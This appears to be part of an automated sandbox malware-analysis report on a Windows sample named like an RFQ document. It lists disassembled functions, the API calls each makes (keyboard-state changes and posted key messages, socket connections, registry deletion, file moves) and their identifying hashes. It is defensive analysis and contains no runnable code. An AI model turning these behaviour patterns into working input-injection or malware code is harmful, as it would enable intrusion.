                                              • Opcode ID: 3b05bab6c7fefcbd495905ac268d12fd73395b6661934cab3f2487279e2f51e4
                                              • Instruction ID: 03bc9a8746db6fdac393078ba53ebd5f9189cb85400f1c0188a6227fc9f6a8b8
                                              • Opcode Fuzzy Hash: 3b05bab6c7fefcbd495905ac268d12fd73395b6661934cab3f2487279e2f51e4
                                              • Instruction Fuzzy Hash: 68618B75A00659DFCB14EF65C880AAEBBF5FF48310F14846DE85AAB352CB30AD45CB90
                                              Function 0014145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(?), ref: 0014149C
                                              • GetKeyboardState.USER32(?), ref: 001414B1
                                              • SetKeyboardState.USER32(?), ref: 00141512
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00141540
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0014155F
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 001415A5
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001415C8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 08a327e8c3ee05dcbcb4990a84ba8af9d76c4da11741896ff507c01c12f66e01
                                              • Instruction ID: 2f22c19cd44c486e05a6baf887866c94186f231f33672e038edad2c0456ed023
                                              • Opcode Fuzzy Hash: 08a327e8c3ee05dcbcb4990a84ba8af9d76c4da11741896ff507c01c12f66e01
                                              • Instruction Fuzzy Hash: 8851E1A0A447D53EFB3647348C45BBABFA96B46304F0C8589E5D64A8E2D3D8ECC4D760
                                              Function 00141276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(00000000), ref: 001412B5
                                              • GetKeyboardState.USER32(?), ref: 001412CA
                                              • SetKeyboardState.USER32(?), ref: 0014132B
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00141357
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00141374
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001413B8
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001413D9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 6e4f8ed6132e61c925757ba474001a020ef3965d471d414f687351bb50718e42
                                              • Instruction ID: b60ab485d282145e81c32844bbb61e211df76aad3cc7817a1a40b403438164c9
                                              • Opcode Fuzzy Hash: 6e4f8ed6132e61c925757ba474001a020ef3965d471d414f687351bb50718e42
                                              • Instruction Fuzzy Hash: B05105A15447D53DFB3287248C45BBABFA96F06310F0C8589E1D886CE2D394ECD5D760
                                              Function 0014589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: 5e0e192eb21f4b021788eb7caac13549d8b16fff2d69ee12cd7a86558c19aa6a
                                              • Instruction ID: 9c77c40c337d307429e56fff262d4cf2e920b74b15b2c47bbd83ee570903d66a
                                              • Opcode Fuzzy Hash: 5e0e192eb21f4b021788eb7caac13549d8b16fff2d69ee12cd7a86558c19aa6a
                                              • Instruction Fuzzy Hash: B14192B5C20618B6CB10EBB4CC8A9CFB3AD9F14310F608556F558E3162E774E715C7A9
                                              Function 0016A2C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @U=u
                                              • API String ID: 0-2594219639
                                              • Opcode ID: 94d4051dbb99373c6b36578517439084dc79cbb12e1b468129bb9078e8f2b0cf
                                              • Instruction ID: b8f903c4627557ce781d8778d57d97fa3ad6632be468507367f851a3753ed467
                                              • Opcode Fuzzy Hash: 94d4051dbb99373c6b36578517439084dc79cbb12e1b468129bb9078e8f2b0cf
                                              • Instruction Fuzzy Hash: 1041D035900204AFC724DF28DC48FB9BBA8FF09310F994165E966B72E1DB70ADA1DE51
                                              Function 001438AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001438D3,?), ref: 001448C7
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001438D3,?), ref: 001448E0
                                              • lstrcmpiW.KERNEL32(?,?), ref: 001438F3
                                              • _wcscmp.LIBCMT ref: 0014390F
                                              • MoveFileW.KERNEL32(?,?), ref: 00143927
                                              • _wcscat.LIBCMT ref: 0014396F
                                              • SHFileOperationW.SHELL32(?), ref: 001439DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: 92f5064e1b39a5fff77f80b7d2493d781a25fa804cc9ebdf78a04b3a304d3344
                                              • Instruction ID: 5fcdec6b3054a1000591f6ebd9306be66d06ff28ee3785081090e3e7a7a0e308
                                              • Opcode Fuzzy Hash: 92f5064e1b39a5fff77f80b7d2493d781a25fa804cc9ebdf78a04b3a304d3344
                                              • Instruction Fuzzy Hash: 1C41A0B240C3849EC751EF64C885ADFB7E8AF98344F14192EF499C31A1EB74D689C752
                                              Function 00167500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00167519
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001675C0
                                              • IsMenu.USER32(?), ref: 001675D8
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00167620
                                              • DrawMenuBar.USER32 ref: 00167633
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: 79f73c8a9ff236fb8ed1d38f872126eee82767b4d15b99d30dbefb843b815ed8
                                              • Instruction ID: 2b6cc83d3fb7b3813cf8726b9fd35e5b350f9868686cb18d30fed4a79c08e881
                                              • Opcode Fuzzy Hash: 79f73c8a9ff236fb8ed1d38f872126eee82767b4d15b99d30dbefb843b815ed8
                                              • Instruction Fuzzy Hash: A5414975A04609EFDB10DF54EC84E9ABBF8FB05328F148069E91697290D730AD61CF90
                                              Function 0016122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0016125C
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00161286
                                              • FreeLibrary.KERNEL32(00000000), ref: 0016133D
                                                • Part of subcall function 0016122D: RegCloseKey.ADVAPI32(?), ref: 001612A3
                                                • Part of subcall function 0016122D: FreeLibrary.KERNEL32(?), ref: 001612F5
                                                • Part of subcall function 0016122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00161318
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 001612E0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: f199db38814819f143b2bd2191f247e5916e05aeab90200c621eab094e00d322
                                              • Instruction ID: a88950883d4e1ea8b9f34de4a59ae28fc862f9145f75285c3faabe84a6e1a728
                                              • Opcode Fuzzy Hash: f199db38814819f143b2bd2191f247e5916e05aeab90200c621eab094e00d322
                                              • Instruction Fuzzy Hash: B7313E71901119BFDB14DB90EC89EFFB7BCEF08350F140169F502E2651DB749E959AA0
                                              Function 00156486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001580A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001580CB
                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001564D9
                                              • WSAGetLastError.WSOCK32(00000000), ref: 001564E8
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00156521
                                              • connect.WSOCK32(00000000,?,00000010), ref: 0015652A
                                              • WSAGetLastError.WSOCK32 ref: 00156534
                                              • closesocket.WSOCK32(00000000), ref: 0015655D
                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00156576
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                              • String ID:
                                              • API String ID: 910771015-0
                                              • Opcode ID: 87e515674fb07160550493d297285bb2923d2b7d0221500eb9b7858437ea3973
                                              • Instruction ID: 2cc066b06bc4fcf3dadb4e2105de7d76482bfe54fa88e86bbb61a6cfb165e38b
                                              • Opcode Fuzzy Hash: 87e515674fb07160550493d297285bb2923d2b7d0221500eb9b7858437ea3973
                                              • Instruction Fuzzy Hash: 9631B171600218EFDB10AF24DC85BBE7BACEF44751F448069FD15AB291DBB0AD49CBA1
                                              Function 00139372 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001393F6
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00139409
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00139439
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 365058703-2258501812
                                              • Opcode ID: 4f5dcc182427d7b35b9f3cdf9a392d03e276b1c134d01491cc7b4053cd7da0ef
                                              • Instruction ID: fa9d4321e1b2d4d843b52fb630aba2dd8a64cde2f46522c1d2e02b5390fb1eed
                                              • Opcode Fuzzy Hash: 4f5dcc182427d7b35b9f3cdf9a392d03e276b1c134d01491cc7b4053cd7da0ef
                                              • Instruction Fuzzy Hash: F52121B1904104BFDB18ABB4DC86CFFB778DF05360F15412DF926A72E2DBB40A0A9660
                                              Function 0013E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0013E0FA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0013E120
                                              • SysAllocString.OLEAUT32(00000000), ref: 0013E123
                                              • SysAllocString.OLEAUT32 ref: 0013E144
                                              • SysFreeString.OLEAUT32 ref: 0013E14D
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 0013E167
                                              • SysAllocString.OLEAUT32(?), ref: 0013E175
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 71f59b4d23100032c81facc5e1ad315f12a4a668ae31f8ed174be7212cfa5cc9
                                              • Instruction ID: 1635d554ac8d574020bf7f965dfcb605afceb6b54abd928b054d9ceef95d1e2f
                                              • Opcode Fuzzy Hash: 71f59b4d23100032c81facc5e1ad315f12a4a668ae31f8ed174be7212cfa5cc9
                                              • Instruction Fuzzy Hash: 87215335604208AFDB149FA8DC88DBB77ECEB09760F108139F955CB6A4DBB0DC818B64
                                              Function 0013B6AF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0013B6C7
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0013B6E4
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0013B71C
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0013B742
                                              • _wcsstr.LIBCMT ref: 0013B74C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID: @U=u
                                              • API String ID: 3902887630-2594219639
                                              • Opcode ID: 45557073cdb1629b6187ad0e043c35bb71bb8144abb0270991d4b43ef05e2155
                                              • Instruction ID: 22888ada50fa1ca6de5d1128d94634627c13df208a9ea00c57ae5d608545c8b7
                                              • Opcode Fuzzy Hash: 45557073cdb1629b6187ad0e043c35bb71bb8144abb0270991d4b43ef05e2155
                                              • Instruction Fuzzy Hash: 31210771208204BBEB255B39EC8AE7B7B98DF89720F10402DF905CA1E1FBA1CC4192A0
                                              Function 001397E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00139802
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00139834
                                              • __itow.LIBCMT ref: 0013984C
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00139874
                                              • __itow.LIBCMT ref: 00139885
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID: @U=u
                                              • API String ID: 2983881199-2594219639
                                              • Opcode ID: 25d7898c3505c54a37c72022d32d75cff379848424c7483fd6c4d6fcf0b1ea84
                                              • Instruction ID: 5b53c71dd8bc82392b60cc278f8bdd3730278b6ada2d52bbd63a1414bbcbbd7a
                                              • Opcode Fuzzy Hash: 25d7898c3505c54a37c72022d32d75cff379848424c7483fd6c4d6fcf0b1ea84
                                              • Instruction Fuzzy Hash: 5A21C871700248AFEB109A65DC86EEE7BA8DF89710F040069F904EB291D7F08D4187D1
                                              Function 0016783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000E1D73
                                                • Part of subcall function 000E1D35: GetStockObject.GDI32(00000011), ref: 000E1D87
                                                • Part of subcall function 000E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E1D91
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001678A1
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001678AE
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001678B9
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001678C8
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001678D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 5e6828cfd94dbf2f5f6a03e98bfcdcc94c2565cdbe01cec9008a2a6b12ec8b78
                                              • Instruction ID: 0095a088c8fc514d288a35a9dc87cb6c1975ceb5bae8234217415755a1239514
                                              • Opcode Fuzzy Hash: 5e6828cfd94dbf2f5f6a03e98bfcdcc94c2565cdbe01cec9008a2a6b12ec8b78
                                              • Instruction Fuzzy Hash: A81190B2514219BFEF159F60CC85EE77F6DEF08758F014115FA04A20A0C7729C61DBA0
                                              Function 001041C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00104292,?), ref: 001041E3
                                              • GetProcAddress.KERNEL32(00000000), ref: 001041EA
                                              • EncodePointer.KERNEL32(00000000), ref: 001041F6
                                              • DecodePointer.KERNEL32(00000001,00104292,?), ref: 00104213
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoInitialize$combase.dll
                                              • API String ID: 3489934621-340411864
                                              • Opcode ID: 5500ad1f123ebad67086c9043e9627f7f80761f3c62a8202d8a4ce93f22c49aa
                                              • Instruction ID: 22ce72ade68dbcb0d546d17c456893c7f62d5bc07a8958a6e359cdb0b3806c62
                                              • Opcode Fuzzy Hash: 5500ad1f123ebad67086c9043e9627f7f80761f3c62a8202d8a4ce93f22c49aa
                                              • Instruction Fuzzy Hash: 5BE01AB0690300AFEB206BB0FC49B143AA5F7A6B02F108428F591D59E0DBF560DBCF00
                                              Function 0010429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001041B8), ref: 001042B8
                                              • GetProcAddress.KERNEL32(00000000), ref: 001042BF
                                              • EncodePointer.KERNEL32(00000000), ref: 001042CA
                                              • DecodePointer.KERNEL32(001041B8), ref: 001042E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
